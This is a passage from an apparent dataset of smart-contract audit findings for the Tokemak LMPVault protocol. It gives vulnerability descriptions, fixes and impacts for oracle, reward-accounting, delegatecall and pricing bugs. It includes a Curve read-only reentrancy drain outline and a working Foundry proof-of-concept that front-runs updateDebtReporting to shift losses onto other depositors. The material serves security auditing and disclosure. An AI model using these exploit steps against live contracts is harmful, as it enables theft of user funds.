updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n" +Price returned by Oracle is not verified,medium,"As per the example provided by Tellor on how to integrate the Tellor oracle into the system, it has shown the need to check that the price returned by the oracle is not zero.\\n```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n\\nThus, the value returned from the `getDataBefore` function should be verified to ensure that the price returned by the oracle is not zero. However, this was not implemented.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n","Update the affected function as follows.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp // Remove the line below\\n 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n// Remove the line below\\n if (timestampRetrieved == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n// Add the line below\\n if (timestampRetrieved == 0 || value == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n","The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIf an incorrect value of zero is returned from Tellor, affected assets within the protocol will be considered worthless.","```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n" +ETH deposited by the user may be stolen.,high,"In the `deposit` function, if the user pays with ETH, it will first call `_processEthIn` to wrap it and then call `pullToken` to transfer.\\n```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n\\n`_processEthIn` will wrap ETH into WETH, and these WETH belong to the contract itself.\\n```\\n function _processEthIn(ILMPVault vault) internal {\\n // if any eth sent, wrap it first\\n if (msg.value > 0) {\\n // if asset is not weth, revert\\n if (address(vault.asset()) != address(weth9)) {\\n revert InvalidAsset();\\n }\\n\\n // wrap eth\\n weth9.deposit{ value: msg.value }();\\n }\\n }\\n```\\n\\nHowever, `pullToken` transfers from `msg.sender` and does not use the WETH obtained in `_processEthIn`.\\n```\\n function pullToken(IERC20 token, uint256 amount, address recipient) public payable {\\n token.safeTransferFrom(msg.sender, recipient, amount);\\n }\\n```\\n\\nIf the user deposits 10 ETH and approves 10 WETH to the contract, when the deposit amount is 10, all of the user's 20 WETH will be transferred into the contract.\\nHowever, due to the `amount` being 10, only 10 WETH will be deposited into the vault, and the remaining 10 WETH can be stolen by the attacker using `sweepToken`.\\n```\\n function sweepToken(IERC20 token, uint256 amountMinimum, address recipient) public payable {\\n uint256 balanceToken = token.balanceOf(address(this));\\n if (balanceToken < amountMinimum) revert InsufficientToken();\\n\\n if (balanceToken > 0) {\\n token.safeTransfer(recipient, balanceToken);\\n }\\n }\\n```\\n\\nBoth `mint` and `deposit` in `LMPVaultRouterBase` have this problem.",Perform operations based on the size of `msg.value` and amount:\\nmsg.value == amount: transfer WETH from contract not `msg.sender`\\nmsg.value > amount: transfer WETH from contract not `msg.sender` and refund to `msg.sender`\\nmsg.value < amount: transfer WETH from contract and transfer remaining from `msg.sender`,ETH deposited by the user may be stolen.,"```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n" +Destination Vault rewards are not added to idleIncrease when info.totalAssetsPulled > info.totalAssetsToPull,high,"In the `_withdraw` function, Destination Vault rewards will be first recorded in `info.IdleIncrease` by `info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;`.\\nBut when `info.totalAssetsPulled` > info.totalAssetsToPull, `info.idleIncrease` is directly assigned as `info.totalAssetsPulled` - info.totalAssetsToPull, and `info.totalAssetsPulled` is `assetPulled` without considering Destination Vault rewards.\\n```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n\\nFor example,\\n```\\n // preBal == 100 pulled == 10 reward == 5 toPull == 6\\n // idleIncrease = 115 - 100 - 10 == 5\\n // totalPulled(0) += assetPulled == 10 > toPull\\n // idleIncrease = totalPulled - toPull == 4 < reward\\n```\\n\\nThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.",`info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;` -> `info.idleIncrease += info.totalAssetsPulled - info.totalAssetsToPull;`,"The final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.\\nMeanwhile, due to the `recover` function's inability to extract the `baseAsset`, this will result in no operations being able to handle these Destination Vault rewards, ultimately causing these assets to be frozen within the contract.","```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n" +Liquidations miss delegate call to swapper,high,"The LiquidationRow contract is an orchestrator for the claiming process. It is primarily used to collect rewards for vaults. It has a method called liquidateVaultsForToken. Based on docs this method is for: Conducts the liquidation process for a specific token across a list of vaults, performing the necessary balance adjustments, initiating the swap process via the asyncSwapper, taking a fee from the received amount, and queues the remaining swapped tokens in the MainRewarder associated with each vault.\\n```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n\\nThe second part of the function is performing the liquidation by calling _performLiquidation. A problem is at the beginning of it. IAsyncSwapper is called to swap tokens.\\n```\\nfunction _performLiquidation(\\n uint256 gasBefore,\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params,\\n uint256 totalBalanceToLiquidate,\\n uint256[] memory vaultsBalances\\n) private {\\n uint256 length = vaultsToLiquidate.length;\\n // the swapper checks that the amount received is greater or equal than the params.buyAmount\\n uint256 amountReceived = IAsyncSwapper(asyncSwapper).swap(params);\\n // // rest of code\\n}\\n```\\n\\nAs you can see the LiquidationRow doesn't transfer the tokens to swapper and swapper doesn't pul them either (swap function here). Because of this the function reverses.\\nI noticed that there is no transfer back to LiquidationRow from Swapper either. Tokens can't get in or out.\\nWhen I searched the codebase, I found that Swapper is being called on another place using the delegatecall method. This way it can operate with the tokens of the caller. The call can be found here - LMPVaultRouter.sol:swapAndDepositToVault. So I think that instead of missing transfer, the problem is actually in the way how swapper is called.","Change the async swapper call from the normal function call to the low-level delegatecall function the same way it is done in LMPVaultRouter.sol:swapAndDepositToVault.\\nI would like to address that AsyncSwapperMock in LiquidationRow.t.sol is a poorly written mock and should be updated to represent how the AsyncSwapper work. It would be nice to update the test suite for LiquidationRow because its current state won't catch this. If you check the LiquidationRow.t.sol tests, the mock swap function only mints tokens, no need to use delegatecall. This is why tests missed this vulnerability.",Rewards collected through LiquidationRow claimsVaultRewards get stuck in the contract. Liquidation can't be called because it reverts when Swapper tries to work with tokens it doesn't possess.,"```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n" +"When `queueNewRewards` is called, caller could transfer tokens more than it should be",high,"Inside `queueNewRewards`, irrespective of whether we're near the start or the end of a reward period, if the accrued rewards are too large relative to the new rewards (queuedRatio is greater than newRewardRatio), the new rewards will be added to the queue (queuedRewards) rather than being immediately distributed.\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n\\nHowever, when this function tried to pull funds from sender via `safeTransferFrom`, it used `newRewards` amount, which already added by `startingQueuedRewards`. If previously `queuedRewards` already have value, the processed amount will be wrong.","Update the transfer to use `startingNewRewards` instead of `newRewards` :\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards // Add the line below\\n= startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number // Remove the line below\\n (periodInBlockFinish // Remove the line below\\n durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n// Remove the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n// Add the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), startingNewRewards);\\n }\\n```\\n","There are two possible issue here :\\nIf previously `queuedRewards` is not 0, and the caller don't have enough funds or approval, the call will revert due to this logic error.\\nIf previously `queuedRewards` is not 0, and the caller have enough funds and approval, the caller funds will be pulled more than it should (reward param + `queuedRewards` )","```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n" +Curve V2 Vaults can be drained because CurveV2CryptoEthOracle can be reentered with WETH tokens,high,"`CurveV2CryptoEthOracle.registerPool` takes `checkReentrancy` parameters and this should be True only for pools that have `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` tokens and this is validated here.\\n```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n\\nThis Oracle is meant for Curve V2 pools and the ones I've seen so far use WETH address instead of `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` (like Curve V1) and this applies to all pools listed by Tokemak.\\nFor illustration, I'll use the same pool used to test proper registration. The test is for `CRV_ETH_CURVE_V2_POOL` but this applies to other V2 pools including rETH/ETH. The pool address for `CRV_ETH_CURVE_V2_POOL` is 0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511 while token address is 0xEd4064f376cB8d68F770FB1Ff088a3d0F3FF5c4d.\\nIf you interact with the pool, the coins are: 0 - WETH - 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 1 - CRV - 0xD533a949740bb3306d119CC777fa900bA034cd52\\nSo how can WETH be reentered?! Because Curve can accept ETH for WETH pools.\\nA look at the pool again shows that Curve uses python kwargs and it includes a variable `use_eth` for `exchange`, `add_liquidity`, `remove_liquidity` and `remove_liquidity_one_coin`.\\n```\\ndef exchange(i: uint256, j: uint256, dx: uint256, min_dy: uint256, use_eth: bool = False) -> uint256:\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256, use_eth: bool = False) -> uint256:\\ndef remove_liquidity(_amount: uint256, min_amounts: uint256[N_COINS], use_eth: bool = False):\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256, use_eth: bool = False) -> uint256:\\n```\\n\\nWhen `use_eth` is `true`, it would take `msg.value` instead of transfer WETH from user. And it would make a raw call instead of transfer WETH to user.\\nIf raw call is sent to user, then they could reenter LMP vault and attack the protocol and it would be successful cause CurveV2CryptoEthOracle would not check for reentrancy in getPriceInEth\\n```\\n// Checking for read only reentrancy scenario.\\nif (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n}\\n```\\n\\nA profitable attack that could be used to drain the vault involves\\nDeposit shares at fair price\\nRemove liquidity on Curve and updateDebtReporting in LMPVault with view only reentrancy\\nWithdraw shares at unfair price","If CurveV2CryptoEthOracle is meant for CurveV2 pools with WETH (and no 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), then change the ETH address to weth. As far as I can tell Curve V2 uses WETH address for ETH but this needs to be verified.\\n```\\n- if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n+ if (tokens[0] != WETH && tokens[1] != WETH) revert MustHaveEthForReentrancy();\\n```\\n","The protocol could be attacked with price manipulation using Curve read only reentrancy. The consequence would be fatal because `getPriceInEth` is used for evaluating debtValue and this evaluation decides shares and debt that would be burned in a withdrawal. Therefore, an inflated value allows attacker to withdraw too many asset for their shares. This could be abused to drain assets on LMPVault.\\nThe attack is cheap, easy and could be bundled in as a flashloan attack. And it puts the whole protocol at risk cause a large portion of their deposit would be on Curve V2 pools with WETH token.",```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n +"updateDebtReporting can be front run, putting all the loss on later withdrawals but taking the profit",high,"updateDebtReporting takes in a user input of destinations in array whose debt to report, so if a destination vault is incurring loss and is not on the front of withdrawalQueue than a attacker can just update debt for only the destination which are incurring a profit and withdraw in the same txn. He will exit the vault with profit, others who withdraw after the legit updateDebtReporting txn will suffer even more loss than they should have, as some part of the profit which was used to offset the loss was taken by the attacker and protocol fees\\nPOC-\\nLMPVault has 2000 in deposits 1000 from alice and 1000 from bob\\nVault has invested that in 1000 in DestinationVault1 & 1000 in DestinationVault2 (no idle for simple calculations)\\nNow Dv1 gain a profit of 5%(+50 base asset) while Dv2 is in 10% loss(-100 base asset)\\nSo vault has net loss of 50. Now alice does a updateDebtReporting([Dv1]) and not including Dv2 in the input array.\\nNow she withdraws her money, protocol now falsely believes there is a profit, it also take 20% profit fees(assumed) and mints 10 shares for itself and alice walks away with roughly 1020 assets, incurring no loss\\nNow a legit updateDebtReporting txn comes and bob has to account in for the loss\\nTest for POC - Add it to LMPVaultMintingTests contract in LMPVault-Withdraw.t.sol file under path test/vault. run it via the command\\n```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n\\n```\\nfunction test_AvoidTheLoss() public {\\n\\n// for simplicity sake, i'll be assuming vault keeps nothing idle\\n\\n// as it does not affect the attack vector in any ways\\n\\n_accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n\\n_accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\naddress feeSink = vm.addr(555);\\n\\n_lmpVault.setFeeSink(feeSink);\\n\\n_lmpVault.setPerformanceFeeBps(2000); // 20%\\n\\naddress alice = address(789);\\n\\nuint initialBalanceAlice = 1000;\\n\\n// User is going to deposit 1000 asset\\n\\n_asset.mint(address(this), 1000);\\n\\n_asset.approve(address(_lmpVault), 1000);\\n\\nuint shareBalUser = _lmpVault.deposit(1000, address(this));\\n\\n_underlyerOne.mint(address(this),500);\\n\\n_underlyerOne.approve(address(_lmpVault),500);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultOne),\\n\\naddress(_underlyerOne),\\n\\n500,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n_asset.mint(alice,initialBalanceAlice);\\n\\nvm.startPrank(alice);\\n\\n_asset.approve(address(_lmpVault),initialBalanceAlice);\\n\\nuint shareBalAlice = _lmpVault.deposit(initialBalanceAlice,alice);\\n\\nvm.stopPrank();\\n\\n// rebalance to 2nd vault\\n\\n_underlyerTwo.mint(address(this), 1000);\\n\\n_underlyerTwo.approve(address(_lmpVault),1000);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultTwo),\\n\\naddress(_underlyerTwo),\\n\\n1000,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n// the second destVault incurs loss, 10%\\n\\n_mockRootPrice(address(_underlyerTwo), 0.9 ether);\\n\\n \\n\\n// the first vault incurs some profit, 5%\\n\\n// so lmpVault is in netLoss of 50 baseAsset\\n\\n_mockRootPrice(address(_underlyerOne), 2.1 ether);\\n\\n// malicious updateDebtReporting by alice\\n\\naddress[] memory alteredDestinations = new address[](1);\\n\\nalteredDestinations[0] = address(_destVaultOne);\\n\\nvm.prank(alice);\\n\\n_lmpVault.updateDebtReporting(alteredDestinations);\\n\\n \\n\\n// alice withdraws first\\n\\nvm.prank(alice);\\n\\n_lmpVault.redeem(shareBalAlice , alice,alice);\\n\\nuint finalBalanceAlice = _asset.balanceOf(alice);\\n\\nemit log_named_uint(""final Balance of alice "", finalBalanceAlice);\\n\\n// protocol also collects its fees\\n\\n// further wrecking the remaining LPs\\n\\nemit log_named_uint(""Fees shares give to feeSink "", _lmpVault.balanceOf(feeSink));\\n\\nassertGt( finalBalanceAlice, initialBalanceAlice);\\n\\nassertGt(_lmpVault.balanceOf(feeSink), 0);\\n\\n// now updateDebtReporting again but for all DVs\\n\\n_lmpVault.updateDebtReporting(_destinations);\\n\\n \\n\\nemit log_named_uint(""Remaining LPs can only get "",_lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(""Protocol falsely earned(in base asset)"", _lmpVault.maxWithdraw(feeSink));\\n\\nemit log_named_uint(""Vault totalAssets"" , _lmpVault.totalAssets());\\n\\nemit log_named_uint(""Effective loss take by LPs"", 1000 - _lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(""Profit for Alice"",_asset.balanceOf(alice) - initialBalanceAlice);\\n\\n}\\n```\\n\\nLogs: final Balance of alice : 1019 Fees shares give to feeSink : 10 Remaining LPs can only get : 920 Protocol falsely earned(in base asset): 9 Vault totalAssets: 930 Effective loss take by LPs: 80 Profit for Alice: 19","updateDebtReporting should not have any input param, should by default update for all added destination vaults",Theft of user funds. Submitting as high as attacker only needs to frontrun a updateDebtReporting txn with malicious input and withdraw his funds.,```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n +Inflated price due to unnecessary precision scaling,high,"The `price` at Line 137 below is denominated in 18 decimals as the `getPriceInEth` function always returns the `price` in 18 decimals precision.\\nThere is no need to scale the accumulated price by 1e18.\\nIt will cause the average price (existing._initAcc) to be inflated significantly\\nThe numerator will almost always be larger than the denominator (INIT_SAMPLE_COUNT = 18). There is no risk of it rounding to zero, so any scaling is unnecessary.\\nAssume that throughout the initialization process, the `getPriceInEth(XYZ)` always returns 2 ETH (2e18). After 18 rounds (INIT_SAMPLE_COUNT == 18) of initialization, `existing._initAcc` will equal 36 ETH (36e18). As such, the `averagePrice` will be as follows:\\n```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n\\n`existing.fastFilterPrice` and `existing.slowFilterPrice` will be set to `2e36` at Lines 157 and 158 below.\\nIn the post-init phase, the `getPriceInEth` function return 3 ETH (3e18). Thus, the following code will be executed at Line 144s and 155 below:\\n```\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, 2e36, 3e18); // SLOW_ALPHA = 645e14; // 0.0645\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, 2e36, 3e18); // FAST_ALPHA = 33e16; // 0.33\\n```\\n\\nAs shown above, the existing filter prices are significantly inflated by the scale of 1e18, which results in the prices being extremely skewed.\\nUsing the formula of fast filter, the final fast filter price computed will be as follows:\\n```\\n((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18\\n((priorValue * (1e18 - 33e16)) + (currentValue * 33e16)) / 1e18\\n((priorValue * 67e16) + (currentValue * 33e16)) / 1e18\\n((2e36 * 67e16) + (3e18 * 33e16)) / 1e18\\n1.34e36 (1340000000000000000 ETH)\\n```\\n\\nThe token is supposed only to be worth around 3 ETH. However, the fast filter price wrongly determine that it is worth around 1340000000000000000 ETH\\n```\\nFile: IncentivePricingStats.sol\\n function updatePricingInfo(IRootPriceOracle pricer, address token) internal {\\n..SNIP..\\n uint256 price = pricer.getPriceInEth(token);\\n\\n // update the timestamp no matter what phase we're in\\n existing.lastSnapshot = uint40(block.timestamp);\\n\\n if (existing._initComplete) {\\n // post-init phase, just update the filter values\\n existing.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\n existing.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n } else {\\n // still the initialization phase\\n existing._initCount += 1;\\n existing._initAcc += price;\\n\\n // snapshot count is tracked internally and cannot be manipulated\\n // slither-disable-next-line incorrect-equality\\n if (existing._initCount == INIT_SAMPLE_COUNT) { // @audit-info INIT_SAMPLE_COUNT = 18;\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n }\\n }\\n```\\n","Remove the 1e18 scaling.\\n```\\nif (existing._initCount == INIT_SAMPLE_COUNT) {\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n// Remove the line below\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n// Add the line below\\n uint256 averagePrice = existing._initAcc / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n}\\n```\\n","The price returned by the stat calculators will be excessively inflated. The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides incorrect and inflated pricing, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.",```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n +Immediately start getting rewards belonging to others after staking,high,"Note This issue affects both LMPVault and DV since they use the same underlying reward contract.\\nAssume a new user called Bob mints 100 LMPVault or DV shares. The ERC20's `_mint` function will be called, which will first increase Bob's balance at Line 267 and then trigger the `_afterTokenTransfer` hook at Line 271.\\n```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n\\nThe `_afterTokenTransfer` hook will automatically stake the newly minted shares to the rewarder contracts on behalf of Bob.\\n```\\nFile: LMPVault.sol\\n function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {\\n..SNIP..\\n if (to != address(0)) {\\n rewarder.stake(to, amount);\\n }\\n }\\n```\\n\\nWithin the `MainRewarder.stake` function, it will first call the `_updateReward` function at Line 87 to take a snapshot of accumulated rewards. Since Bob is a new user, his accumulated rewards should be zero. However, this 